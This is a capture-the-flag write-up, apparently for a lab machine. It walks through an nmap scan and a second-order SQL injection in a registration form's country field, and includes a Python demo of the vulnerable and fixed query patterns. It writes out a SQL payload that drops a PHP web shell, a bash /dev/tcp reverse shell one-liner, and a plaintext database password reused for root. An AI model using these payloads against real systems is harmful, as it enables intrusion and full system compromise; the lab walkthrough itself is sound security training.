```
nmap -sC -sV -oA validation 10.10.11.116
Nmap scan report for 10.10.11.116
Host is up (0.18s latency).
Not shown: 992 closed ports
PORT     STATE    SERVICE       VERSION
22/tcp   open     ssh           OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 d8:f5:ef:d2:d3:f9:8d:ad:c6:cf:24:85:94:26:ef:7a (RSA)
|   256 46:3d:6b:cb:a8:19:eb:6a:d0:68:86:94:86:73:e1:72 (ECDSA)
|_  256 70:32:d7:e3:77:c1:4a:cf:47:2a:de:e5:08:7a:f8:7a (ED25519)
80/tcp   open     http          Apache httpd 2.4.48 ((Debian))
|_http-server-header: Apache/2.4.48 (Debian)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
5000/tcp filtered upnp
5001/tcp filtered commplex-link
5002/tcp filtered rfe
5003/tcp filtered filemaker
5004/tcp filtered avt-profile-1
8080/tcp open     http          nginx
|_http-title: 502 Bad Gateway
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
We have 3 ports open:

- 22 => ssh
- 80 => http
- 8080 => http

Port 8080 gives a 502 Bad Gateway, so let's enumerate port 80.

![[Pasted image 20210923191459.png]]

Going to http://10.10.11.116 we have a registration form.

![[Pasted image 20210923191422.png]]

Putting in some data and clicking submit:

![[Pasted image 20210923192723.png]]

It seems like it's saving our input into the database and then fetching it and displaying it on the page, or it is just displaying it without using a database.

Tried injecting a single quote in the username field but nothing happened. Then I intercepted the request and injected a single quote in the country parameter and got this error:

![[Pasted image 20210923193406.png]]
Making the connection sleep for 10 seconds:

```
Andorra' UNION SELECT sleep(10); -- -
```

![[Pasted image 20210923195623.png]]

After following the redirect, it worked successfully.

![[Pasted image 20210923195446.png]]

I guess we have a second-order SQL injection vulnerability, because the sleep occurs when fetching (displaying) the data on the page, and doesn't occur when the data is first submitted.

That means the user input is handled correctly when it is inserted, but when the web application later reads the stored value back out of the database and builds a new query with it, it doesn't treat that value as untrusted again.

Now that we have SQLi, let's try to drop a shell on the box.
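The second-order pattern described above, as an added example (not code from the original write-up or from the box itself). It uses an in-memory SQLite database and hypothetical `register` / `list_users_in_same_country` functions: the first query is parameterized, so the payload is stored harmlessly, but the second query concatenates the stored `country` value, so the injection fires on display rather than on submit. The fixed version parameterizes the second query too.

```python
import sqlite3

# Constructed payload in the style of the one used on the box: the stored value
# is only dangerous once it is concatenated into a later query.
PAYLOAD_COUNTRY = "Andorra' UNION SELECT marker FROM other_data -- -"


def make_db() -> sqlite3.Connection:
    """Build a small in-memory database with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE registration (username TEXT, country TEXT)")
    conn.execute("CREATE TABLE other_data (marker TEXT)")
    conn.execute("INSERT INTO other_data VALUES ('INJECTED')")
    return conn


def register(conn: sqlite3.Connection, username: str, country: str) -> None:
    """First hop: parameterized INSERT, so the payload is stored verbatim and
    does nothing here. This is why testing the form directly shows no bug."""
    conn.execute("INSERT INTO registration VALUES (?, ?)", (username, country))
    conn.commit()


def stored_country(conn: sqlite3.Connection, username: str) -> str:
    row = conn.execute(
        "SELECT country FROM registration WHERE username = ?", (username,)
    ).fetchone()
    return row[0]


def list_users_in_same_country_vulnerable(conn, username: str) -> set:
    """Second hop (vulnerable): the value came from our own database, so the
    developer trusted it and built the query by string formatting."""
    country = stored_country(conn, username)
    query = f"SELECT username FROM registration WHERE country = '{country}'"
    return {r[0] for r in conn.execute(query)}


def list_users_in_same_country_fixed(conn, username: str) -> set:
    """Second hop (fixed): data read back from the database is still data,
    so it is bound as a parameter, never spliced into SQL text."""
    country = stored_country(conn, username)
    return {
        r[0]
        for r in conn.execute(
            "SELECT username FROM registration WHERE country = ?", (country,)
        )
    }


def demo():
    conn = make_db()
    register(conn, "alice", "Andorra")
    register(conn, "mallory", PAYLOAD_COUNTRY)
    vulnerable = list_users_in_same_country_vulnerable(conn, "mallory")
    fixed = list_users_in_same_country_fixed(conn, "mallory")
    return vulnerable, fixed


if __name__ == "__main__":
    v, f = demo()
    print("vulnerable second query returned:", sorted(v))  # includes 'INJECTED'
    print("fixed second query returned:     ", sorted(f))  # only the real match
```

The detection lesson is the same as on the box: a payload that does nothing at submit time can still fire later, so fuzzing only the request that stores the data misses it; every place a stored field is read back into a new query has to use parameters.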
```
Andorra' UNION SELECT '<?php SYSTEM($_GET["c"]) ?>' INTO OUTFILE '/var/www/html/shell.php' -- -
```

![[Pasted image 20210923203159.png]]

![[Pasted image 20210923203456.png]]

We get an error, but when we visit shell.php it has been created successfully.

![[Pasted image 20210923203702.png]]

Now let's set the `c` parameter to execute the `id` command.

![[Pasted image 20210923203810.png]]

You can use any reverse shell you want; I like using this one:

```
bash -c 'bash -i >& /dev/tcp/<ip>/<port> 0>&1'
```

![[Pasted image 20210923205030.png]]

There is a config file that contains the MySQL credentials `uhc:uhc-9qual-global-pw`.

![[Pasted image 20210923211743.png]]

Tried this password for root, and we are now root!

![[Pasted image 20210923212023.png]]